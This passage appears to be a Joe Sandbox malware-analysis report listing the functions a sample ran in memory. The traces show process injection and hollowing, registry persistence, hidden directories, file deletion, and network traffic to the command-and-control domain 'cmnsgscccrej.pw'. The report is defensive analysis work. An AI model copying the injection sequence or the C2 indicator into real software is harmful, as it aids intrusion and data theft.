2876->2878 2877->2869 2877->2875 2878->2869 2879 47e0a16 VirtualProtectEx 2878->2879 2879->2869 2879->2871 2881 47e3653 2880->2881 2882 47e09de CreateProcessA 2881->2882 2883 47e09ee GetThreadContext 2882->2883 2884 47e0aec 2882->2884 2883->2884 2885 47e0a16 VirtualProtectEx 2883->2885 2886 47e0af3 89 API calls 2884->2886 2885->2884 2887 47e0a3c DuplicateHandle 2885->2887 2888 47e0af1 2886->2888 2887->2884 2890 47e0a82 WriteProcessMemory 2887->2890 2888->2874 2890->2884 2891 47e0ab0 ResumeThread 2890->2891 2892 47e0ac1 Sleep OpenMutexA 2891->2892 2892->2888 2893 47e0ae7 2892->2893 2893->2884 2893->2892 2896 47e0b01 2894->2896 2897 47e0cc4 2 API calls 2896->2897 2898 47e0b0d 2897->2898 2905 47e0b27 2898->2905 2900 47e0b20 2901 47e0b40 2900->2901 2902 47e0c9c GetProcAddress 2900->2902 2903 47e0b57 2901->2903 2912 47e0b65 2901->2912 2902->2901 2906 47e3653 2905->2906 2907 47e0b2c LoadLibraryA 2906->2907 2908 47e0c9c GetProcAddress 2907->2908 2909 47e0b42 2908->2909 2910 47e0b65 96 API calls 2909->2910 2911 47e0b57 2910->2911 2911->2900 2913 47e3653 2912->2913 2914 47e0b6a FindWindowA 2913->2914 2915 47e0bac 2914->2915 2916 47e0b74 GetWindowThreadProcessId OpenProcess 2914->2916 2917 47e08b3 93 API calls 2915->2917 2916->2915 2918 47e0b8e 2916->2918 2920 47e0bb1 2917->2920 2919 47e0de0 3 API calls 2918->2919 2921 47e0b99 2919->2921 2922 47e0c3f GetPEB 2920->2922 2921->2915 2923 47e0b9d 2921->2923 2925 47e0bb6 2922->2925 2923->2915 2924 47e0ba4 ExitProcess 2923->2924 2925->2903 2925->2925 2927 47e28cb 2926->2927 3069 47e4d25 3070 47e4d4e 3069->3070 3071 47e4d32 3069->3071 3071->3070 3072 47e4d44 SetEvent 3071->3072 3072->3070 3130 47e3883 3131 47e3888 3130->3131 3136 47e38ce 3131->3136 3133 47e3894 3133->3133 3134 47e2683 4 API calls 3133->3134 3135 47e3913 3134->3135 3137 47e25e8 10 API calls 3136->3137 3138 47e38e8 lstrcat 3137->3138 3139 47e38fe 3138->3139 3140 47e2683 4 API calls 3139->3140 3141 47e3913 3140->3141 3141->3133 3142 47e4b01 3144 47e4b14 3142->3144 3143 47e4b4a 3144->3143 3146 47e4c50 3144->3146 3148 47e4c82 3146->3148 3147 47e4cd3 3147->3143 3148->3147 3149 47e26f9 4 API calls 3148->3149 3149->3147

                                                                                                                                                                          Executed Functions

                                                                                                                                                                          Function 047E2F88 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 72networkCOMMON
                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 308 47e2f88-47e2ffc call 47e3653 call 47e3673 call 47e3558 call 47e363b send 321 47e2ffe 308->321 322 47e3042-47e3054 closesocket 308->322 323 47e3001-47e3015 send 321->323 323->322 324 47e3017-47e301c 323->324 324->323 325 47e301e-47e3023 324->325 326 47e3026-47e3038 recv 325->326 326->322 327 47e303a-47e303e 326->327 327->326 328 47e3040 327->328 328->322
                                                                                                                                                                          APIs
                                                                                                                                                                          • send.WS2_32(?,00000000,00000000,00000000), ref: 047E2FF4
                                                                                                                                                                          • send.WS2_32(?,047E2A30,047E2A2C,00000000), ref: 047E300D
                                                                                                                                                                          • recv.WS2_32(?,047E2A30,00A00000,00000000), ref: 047E3030
                                                                                                                                                                          • closesocket.WS2_32(?), ref: 047E304A
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.2980119764.00000000047E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047E0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_47e0000_winver.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: send$closesocketrecv
                                                                                                                                                                          • String ID: cmnsgscccrej.pw
                                                                                                                                                                          • API String ID: 3431254638-1830621847
                                                                                                                                                                          • Opcode ID: 9574067959f33b04d739d713f0caaf9cbaae1037dcd8482bb700ab3644756bfa
                                                                                                                                                                          • Instruction ID: 2652135ea4646eb9e703827332966bc03e21803dad9d206427d9512aa0331cf4
                                                                                                                                                                          • Opcode Fuzzy Hash: 9574067959f33b04d739d713f0caaf9cbaae1037dcd8482bb700ab3644756bfa
                                                                                                                                                                          • Instruction Fuzzy Hash: 2D218172B00114AFFB215E29CC44B6A7BF9EF48784F044694FE09EB255D735ED608BA4
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 047E0DE0 Relevance: 4.6, APIs: 3, Instructions: 57injectionmemorythreadCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • VirtualAllocEx.KERNELBASE(?,00000000,00004F37,00003000,00000040,E8FFF41B,?,E900001B,047E0D88,00000000,0000090B,00000000), ref: 047E0E06
                                                                                                                                                                          • WriteProcessMemory.KERNELBASE(?,-000008D9,00000000,00004F37,00000000), ref: 047E0E24
                                                                                                                                                                          • CreateRemoteThread.KERNELBASE(?,00000000,00000000,?,00000000,00000000,00000000), ref: 047E0E70
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.2980119764.00000000047E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047E0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_47e0000_winver.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AllocCreateMemoryProcessRemoteThreadVirtualWrite
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1718980022-0
                                                                                                                                                                          • Opcode ID: ecdb29b40f7c4aeff1928634133c43dba02166f8c9ac01a718fa6e3a21a6a1c3
                                                                                                                                                                          • Instruction ID: dc2a2b36c6b2663c771f6f30e456d94cf7563f7014eb75abd40e6cd98ebfa9ce
                                                                                                                                                                          • Opcode Fuzzy Hash: ecdb29b40f7c4aeff1928634133c43dba02166f8c9ac01a718fa6e3a21a6a1c3
                                                                                                                                                                          • Instruction Fuzzy Hash: 6C116032100205BBFF105F25CC49FA63B69EF84754F188021FD04BE199D770B520CAA8
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 047E292D Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 169filestringsleepCOMMON
                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          APIs
                                                                                                                                                                          • LoadLibraryA.KERNELBASE(047E2925,00000008,?,00000000,047E2811,00000000), ref: 047E2932
                                                                                                                                                                            • Part of subcall function 047E0C9C: GetProcAddress.KERNEL32(047E2811,047E290A), ref: 047E0CA9
                                                                                                                                                                          • WSAStartup.WS2_32(00000202,00000000), ref: 047E2957
                                                                                                                                                                          • VirtualAlloc.KERNELBASE(00000000,01400000,00003000,00000004), ref: 047E296F
                                                                                                                                                                          • lstrcat.KERNEL32(00000000,047E299D), ref: 047E29AC
                                                                                                                                                                          • lstrcat.KERNEL32(00000000,047E29D4), ref: 047E29E3
                                                                                                                                                                          • lstrcat.KERNEL32(00000000,047E2A0B), ref: 047E2A1A
                                                                                                                                                                          • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 047E2A94
                                                                                                                                                                            • Part of subcall function 047E2683: CreateFileA.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,00000000), ref: 047E269E
                                                                                                                                                                            • Part of subcall function 047E2683: GetFileSize.KERNEL32(?,00000000), ref: 047E26B7
                                                                                                                                                                            • Part of subcall function 047E2683: ReadFile.KERNELBASE(047E298A,?,00000000,?,00000000), ref: 047E26DB
                                                                                                                                                                            • Part of subcall function 047E2683: CloseHandle.KERNEL32(047E298A), ref: 047E26EC
                                                                                                                                                                          • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 047E2AD8
                                                                                                                                                                          • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000001,00000000,00000000,00A00000), ref: 047E2B2E
                                                                                                                                                                          • Sleep.KERNEL32(000A012C,00000000,00000000,00000000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000), ref: 047E2B42
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.2980119764.00000000047E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047E0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_47e0000_winver.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: File$Deletelstrcat$AddressAllocCloseCreateHandleLibraryLoadProcReadSizeSleepStartupVirtual
                                                                                                                                                                          • String ID: `nIu
                                                                                                                                                                          • API String ID: 3655464437-1509933002
                                                                                                                                                                          • Opcode ID: 123cee287050aa4130abb0b2e68c87aa3392ee7ebd80efcf2861b6cc2cd8a842
                                                                                                                                                                          • Instruction ID: 2c74514583c7b2857184e1f26696675b98da5cc4563d67a20f7e7668131cb132
                                                                                                                                                                          • Opcode Fuzzy Hash: 123cee287050aa4130abb0b2e68c87aa3392ee7ebd80efcf2861b6cc2cd8a842
                                                                                                                                                                          • Instruction Fuzzy Hash: 35517971500214AEEB226F72CD48FBB77BCFF44709F0446D6AA45EA156DE30A680DEA1
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 047E0643 Relevance: 16.6, APIs: 11, Instructions: 143synchronizationCOMMON
                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          APIs
                                                                                                                                                                          • CreateMutexA.KERNELBASE(00000000,00000000), ref: 047E065A
                                                                                                                                                                            • Part of subcall function 047E067C: LoadLibraryA.KERNELBASE(047E0673,00000009,?,00000000), ref: 047E0681
                                                                                                                                                                            • Part of subcall function 047E067C: lstrcmpiA.KERNEL32(?,00000000), ref: 047E06EB
                                                                                                                                                                            • Part of subcall function 047E067C: Sleep.KERNELBASE(00001388), ref: 047E06FE
                                                                                                                                                                            • Part of subcall function 047E067C: CreateDirectoryA.KERNELBASE(00000000,00000000,00000000), ref: 047E071F
                                                                                                                                                                            • Part of subcall function 047E067C: SetFileAttributesA.KERNELBASE(00000000,00000002), ref: 047E0731
                                                                                                                                                                            • Part of subcall function 047E067C: CreateDirectoryA.KERNELBASE(00000000,00000000,00000000), ref: 047E0752
                                                                                                                                                                            • Part of subcall function 047E067C: SetFileAttributesA.KERNELBASE(00000000,00000002), ref: 047E0764
                                                                                                                                                                            • Part of subcall function 047E067C: CreateDirectoryA.KERNELBASE(00000000,00000000,00000000), ref: 047E0785
                                                                                                                                                                            • Part of subcall function 047E067C: SetFileAttributesA.KERNELBASE(00000000,00000002), ref: 047E0797
                                                                                                                                                                            • Part of subcall function 047E067C: VirtualAlloc.KERNELBASE(00000000,00100000,00003000,00000004), ref: 047E07AB
                                                                                                                                                                            • Part of subcall function 047E26F9: CreateFileA.KERNELBASE(?,40000000,00000003,00000000,?,00000080,00000000,?,00000000), ref: 047E2715
                                                                                                                                                                            • Part of subcall function 047E26F9: SetFilePointer.KERNELBASE(?,00000000,00000000,00000002), ref: 047E2732
                                                                                                                                                                            • Part of subcall function 047E26F9: WriteFile.KERNELBASE(?,00000000,00000000,00000000,00000000), ref: 047E274E
                                                                                                                                                                            • Part of subcall function 047E26F9: CloseHandle.KERNEL32(?), ref: 047E275F
                                                                                                                                                                            • Part of subcall function 047E0811: RegCreateKeyExA.KERNELBASE(00000000,047E0840,0000002E,?,?,?,?,?,00000002,?,00000000,00000000), ref: 047E0876
                                                                                                                                                                            • Part of subcall function 047E0811: RegSetValueExA.KERNELBASE(?,00000000,00000000,00000001,80000001,00000000), ref: 047E089D
                                                                                                                                                                            • Part of subcall function 047E0811: RegCloseKey.KERNELBASE(?), ref: 047E08A9
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.2980119764.00000000047E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047E0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_47e0000_winver.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CreateFile$AttributesDirectory$Close$AllocHandleLibraryLoadMutexPointerSleepValueVirtualWritelstrcmpi
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2311107590-0
                                                                                                                                                                          • Opcode ID: 23fe9d41b4c0fd8f85a64b07ac5772dc61afcf4539fa5e17d3a9c2967f868177
                                                                                                                                                                          • Instruction ID: 5906faff4f38ca5a26b67b9ecc4537c152cba588bf5dcacd58a1de376caeebec
                                                                                                                                                                          • Opcode Fuzzy Hash: 23fe9d41b4c0fd8f85a64b07ac5772dc61afcf4539fa5e17d3a9c2967f868177
                                                                                                                                                                          • Instruction Fuzzy Hash: 9E5133B2504214AFEF13AF61CC88FAA77BCEF44704F05059DAB85EF146DE706690CAA5
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 047E067C Relevance: 15.1, APIs: 10, Instructions: 122libraryCOMMON
                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          APIs
                                                                                                                                                                          • LoadLibraryA.KERNELBASE(047E0673,00000009,?,00000000), ref: 047E0681
                                                                                                                                                                            • Part of subcall function 047E0C9C: GetProcAddress.KERNEL32(047E2811,047E290A), ref: 047E0CA9
                                                                                                                                                                            • Part of subcall function 047E2597: lstrcat.KERNEL32(047E2634,00000000), ref: 047E25DE
                                                                                                                                                                            • Part of subcall function 047E06C2: lstrcmpiA.KERNEL32(?,00000000), ref: 047E06EB
                                                                                                                                                                            • Part of subcall function 047E06C2: Sleep.KERNELBASE(00001388), ref: 047E06FE
                                                                                                                                                                            • Part of subcall function 047E06C2: CreateDirectoryA.KERNELBASE(00000000,00000000,00000000), ref: 047E071F
                                                                                                                                                                            • Part of subcall function 047E06C2: SetFileAttributesA.KERNELBASE(00000000,00000002), ref: 047E0731
                                                                                                                                                                            • Part of subcall function 047E06C2: CreateDirectoryA.KERNELBASE(00000000,00000000,00000000), ref: 047E0752
                                                                                                                                                                            • Part of subcall function 047E06C2: SetFileAttributesA.KERNELBASE(00000000,00000002), ref: 047E0764
                                                                                                                                                                            • Part of subcall function 047E06C2: CreateDirectoryA.KERNELBASE(00000000,00000000,00000000), ref: 047E0785
                                                                                                                                                                            • Part of subcall function 047E06C2: SetFileAttributesA.KERNELBASE(00000000,00000002), ref: 047E0797
                                                                                                                                                                            • Part of subcall function 047E06C2: VirtualAlloc.KERNELBASE(00000000,00100000,00003000,00000004), ref: 047E07AB
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.2980119764.00000000047E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047E0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_47e0000_winver.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AttributesCreateDirectoryFile$AddressAllocLibraryLoadProcSleepVirtuallstrcatlstrcmpi
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2102637170-0
                                                                                                                                                                          • Opcode ID: 5de239d9be66570cd2289521d95d90d9cab5e80f55aeab0bdb7006df202fe909
                                                                                                                                                                          • Instruction ID: 802e032195e6ae89279158427fa47a9a5f91af8330a60aad32d1135914c48eff
                                                                                                                                                                          • Opcode Fuzzy Hash: 5de239d9be66570cd2289521d95d90d9cab5e80f55aeab0bdb7006df202fe909
                                                                                                                                                                          • Instruction Fuzzy Hash: 814131B2500214AFEF13AF61C888BAA77BCEF44704F050599AB85EF155DE709690CEA5
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 047E06C2 Relevance: 13.6, APIs: 9, Instructions: 97sleepmemorystringCOMMON
                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          APIs
                                                                                                                                                                          • lstrcmpiA.KERNEL32(?,00000000), ref: 047E06EB
                                                                                                                                                                          • Sleep.KERNELBASE(00001388), ref: 047E06FE
                                                                                                                                                                          • CreateDirectoryA.KERNELBASE(00000000,00000000,00000000), ref: 047E071F
                                                                                                                                                                          • SetFileAttributesA.KERNELBASE(00000000,00000002), ref: 047E0731
                                                                                                                                                                          • CreateDirectoryA.KERNELBASE(00000000,00000000,00000000), ref: 047E0752
                                                                                                                                                                          • SetFileAttributesA.KERNELBASE(00000000,00000002), ref: 047E0764
                                                                                                                                                                            • Part of subcall function 047E2597: lstrcat.KERNEL32(047E2634,00000000), ref: 047E25DE
                                                                                                                                                                          • CreateDirectoryA.KERNELBASE(00000000,00000000,00000000), ref: 047E0785
                                                                                                                                                                          • SetFileAttributesA.KERNELBASE(00000000,00000002), ref: 047E0797
                                                                                                                                                                          • VirtualAlloc.KERNELBASE(00000000,00100000,00003000,00000004), ref: 047E07AB
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.2980119764.00000000047E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047E0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_47e0000_winver.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AttributesCreateDirectoryFile$AllocSleepVirtuallstrcatlstrcmpi
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2015199959-0
                                                                                                                                                                          • Opcode ID: 1c226179281e77d9add93f1d77d7a7ba9467f2847751cd0325fb52aca6bbedbc
                                                                                                                                                                          • Instruction ID: 4f78fbee393ea9578b0658a0b5bf30ad834a6bd034ea7b0654cf13b389015857
                                                                                                                                                                          • Opcode Fuzzy Hash: 1c226179281e77d9add93f1d77d7a7ba9467f2847751cd0325fb52aca6bbedbc
                                                                                                                                                                          • Instruction Fuzzy Hash: AF313DB25002249FEF16AF60C888FAA73ACEF44704F4505A9AB85EF145DE709690CEA5
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 047E29A6 Relevance: 10.6, APIs: 7, Instructions: 130sleepfilestringCOMMON
                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          APIs
                                                                                                                                                                          • lstrcat.KERNEL32(00000000,047E299D), ref: 047E29AC
                                                                                                                                                                            • Part of subcall function 047E29DD: lstrcat.KERNEL32(00000000,047E29D4), ref: 047E29E3
                                                                                                                                                                            • Part of subcall function 047E29DD: lstrcat.KERNEL32(00000000,047E2A0B), ref: 047E2A1A
                                                                                                                                                                            • Part of subcall function 047E29DD: DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 047E2A94
                                                                                                                                                                            • Part of subcall function 047E29DD: DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 047E2AD8
                                                                                                                                                                          • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000001,00000000,00000000,00A00000), ref: 047E2B2E
                                                                                                                                                                          • Sleep.KERNEL32(000A012C,00000000,00000000,00000000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000), ref: 047E2B42
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.2980119764.00000000047E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047E0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_47e0000_winver.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: DeleteFilelstrcat$Sleep
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 588723932-0
                                                                                                                                                                          • Opcode ID: a59d9b3575d39faaedf29f35c9c8ec066547d1ec0f6634f348c18150469a5b98
                                                                                                                                                                          • Instruction ID: 18c371fe449bc57e3ea706ba14971b91c3096c596a93059995c803553e8940e4
                                                                                                                                                                          • Opcode Fuzzy Hash: a59d9b3575d39faaedf29f35c9c8ec066547d1ec0f6634f348c18150469a5b98
                                                                                                                                                                          • Instruction Fuzzy Hash: 144127715002149EEB326B72CD4CFBB77BCFF48709F0446D6AA45EA152DE34A680DEA1
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 047E2F3F Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 85stringCOMMON
                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 203 47e2f3f-47e2f7b call 47e3653 call 47e3673 lstrlen call 47e3673 call 47e2f88 212 47e2f7d-47e2f7e 203->212 213 47e2fe2-47e2feb 203->213 214 47e2fad-47e2fe1 call 47e363b 212->214 215 47e2f80-47e2f83 212->215 216 47e2fee-47e2ffc send 213->216 214->213 215->216 217 47e2f86 215->217 219 47e2ffe 216->219 220 47e3042-47e3054 closesocket 216->220 217->214 222 47e3001-47e3015 send 219->222 222->220 224 47e3017-47e301c 222->224 224->222 225 47e301e-47e3023 224->225 226 47e3026-47e3038 recv 225->226 226->220 227 47e303a-47e303e 226->227 227->226 228 47e3040 227->228 228->220
                                                                                                                                                                          APIs
                                                                                                                                                                          • lstrlen.KERNEL32(cmnsgscccrej.pw,00000000,047E2F2E,00000011,?,00000000,00000011,00000000,/EiDQjNbWEQ/,00000000), ref: 047E2F53
                                                                                                                                                                            • Part of subcall function 047E2F88: send.WS2_32(?,00000000,00000000,00000000), ref: 047E2FF4
                                                                                                                                                                            • Part of subcall function 047E2F88: send.WS2_32(?,047E2A30,047E2A2C,00000000), ref: 047E300D
                                                                                                                                                                            • Part of subcall function 047E2F88: recv.WS2_32(?,047E2A30,00A00000,00000000), ref: 047E3030
                                                                                                                                                                            • Part of subcall function 047E2F88: closesocket.WS2_32(?), ref: 047E304A
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.2980119764.00000000047E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047E0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_47e0000_winver.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: send$closesocketlstrlenrecv
                                                                                                                                                                          • String ID: cmnsgscccrej.pw
                                                                                                                                                                          • API String ID: 1577144637-1830621847
                                                                                                                                                                          • Opcode ID: 47e1b1d1e09dae78ecab814af72e97c8beb8c55764ffd7795c611f6a9b2faa7b
                                                                                                                                                                          • Instruction ID: 61c16902e69c0e034b26ce2a946807ec460c464d972d5856849d8f6121b4ff3c
                                                                                                                                                                          • Opcode Fuzzy Hash: 47e1b1d1e09dae78ecab814af72e97c8beb8c55764ffd7795c611f6a9b2faa7b
                                                                                                                                                                          • Instruction Fuzzy Hash: 6D21B672600114BFEB225E25CC44FBA3BEDEF48744F084294FF08EB255D735AA208BA4
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 047E0CE8 Relevance: 10.6, APIs: 7, Instructions: 64sleepprocessCOMMON
                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 229 47e0ce8-47e0cfd 230 47e0d03-47e0d10 CreateToolhelp32Snapshot 229->230 230->230 231 47e0d12-47e0d45 Sleep Process32First 230->231 232 47e0d47-47e0d53 231->232 233 47e0db5-47e0ddb FindCloseChangeNotification Sleep 231->233 234 47e0d54-47e0d63 232->234 233->230 235 47e0d8e-47e0da6 Process32Next 234->235 236 47e0d65-47e0d7a 234->236 235->233 237 47e0da8-47e0daa 235->237 236->235 240 47e0d7c-47e0d88 call 47e0de0 FindCloseChangeNotification 236->240 237->234 239 47e0dac-47e0db3 237->239 239->234 240->235
                                                                                                                                                                          APIs
                                                                                                                                                                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 047E0D07
                                                                                                                                                                          • Sleep.KERNELBASE(000003E8), ref: 047E0D1D
                                                                                                                                                                          • Process32First.KERNEL32(?,00000000), ref: 047E0D3D
                                                                                                                                                                          • FindCloseChangeNotification.KERNELBASE(00000000,0000090B,00000000), ref: 047E0D88
                                                                                                                                                                          • Process32Next.KERNEL32(?,?), ref: 047E0D9E
                                                                                                                                                                          • FindCloseChangeNotification.KERNELBASE(?), ref: 047E0DCA
                                                                                                                                                                          • Sleep.KERNELBASE(000003E8), ref: 047E0DD5
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.2980119764.00000000047E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047E0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_47e0000_winver.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ChangeCloseFindNotificationProcess32Sleep$CreateFirstNextSnapshotToolhelp32
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1902139912-0
                                                                                                                                                                          • Opcode ID: afb6d3aa63b786e4d0f51ac43728f549072800bc8fd610c1c4fa07c95256845f
                                                                                                                                                                          • Instruction ID: c34a993a8982a24e48b9b495d562f3cd8d6277b806ee467bc25e3d4ad71f5f1d
                                                                                                                                                                          • Opcode Fuzzy Hash: afb6d3aa63b786e4d0f51ac43728f549072800bc8fd610c1c4fa07c95256845f
                                                                                                                                                                          • Instruction Fuzzy Hash: 71217131901168ABEF229F15CC54BE9B7B9FF08740F0802D9E919EA295DB70AA90CF55
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 047E261C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 54stringCOMMON
                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 243 47e261c-47e262a call 47e3653 ExpandEnvironmentStringsA 246 47e262c 243->246 247 47e2636-47e2640 243->247 248 47e2634 246->248 249 47e262f call 47e2597 246->249 250 47e266c-47e2679 lstrcat 247->250 251 47e2642-47e265b call 47e265e 247->251 253 47e267f-47e2680 248->253 249->248 250->253 255 47e265d-47e2666 lstrcat 251->255 256 47e26b9-47e26c6 251->256 255->250 257 47e26c8-47e26e3 ReadFile 256->257 258 47e26e9-47e26f6 CloseHandle 256->258 257->258 259 47e26e5-47e26e6 257->259 259->258
                                                                                                                                                                          APIs
                                                                                                                                                                          • ExpandEnvironmentStringsA.KERNEL32(047E260C,00000010,?,?,047E298A,00000104), ref: 047E2621
                                                                                                                                                                          • lstrcat.KERNEL32(047E298A,047E2659), ref: 047E2666
                                                                                                                                                                          • lstrcat.KERNEL32(047E298A,047E298A), ref: 047E2679
                                                                                                                                                                            • Part of subcall function 047E2597: lstrcat.KERNEL32(047E2634,00000000), ref: 047E25DE
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.2980119764.00000000047E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047E0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_47e0000_winver.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: lstrcat$EnvironmentExpandStrings
                                                                                                                                                                          • String ID: \AC\
                                                                                                                                                                          • API String ID: 2903145849-1749977576
                                                                                                                                                                          • Opcode ID: 1a1455d68d8f3bd8c3de392b281e5d27977fe7010f103cb395b91df9d1250492
                                                                                                                                                                          • Instruction ID: ecaeebc60139bfe5004e003f203253e158dd5b2c3d5232efd69586e8733d1ef2
                                                                                                                                                                          • Opcode Fuzzy Hash: 1a1455d68d8f3bd8c3de392b281e5d27977fe7010f103cb395b91df9d1250492
                                                                                                                                                                          • Instruction Fuzzy Hash: A1116A71500508EFEF02DFA1C849EADBBB8FF18344F1442E9E945EE222D7319A51DB94
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 047E29DD Relevance: 9.1, APIs: 6, Instructions: 112stringCOMMON
                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
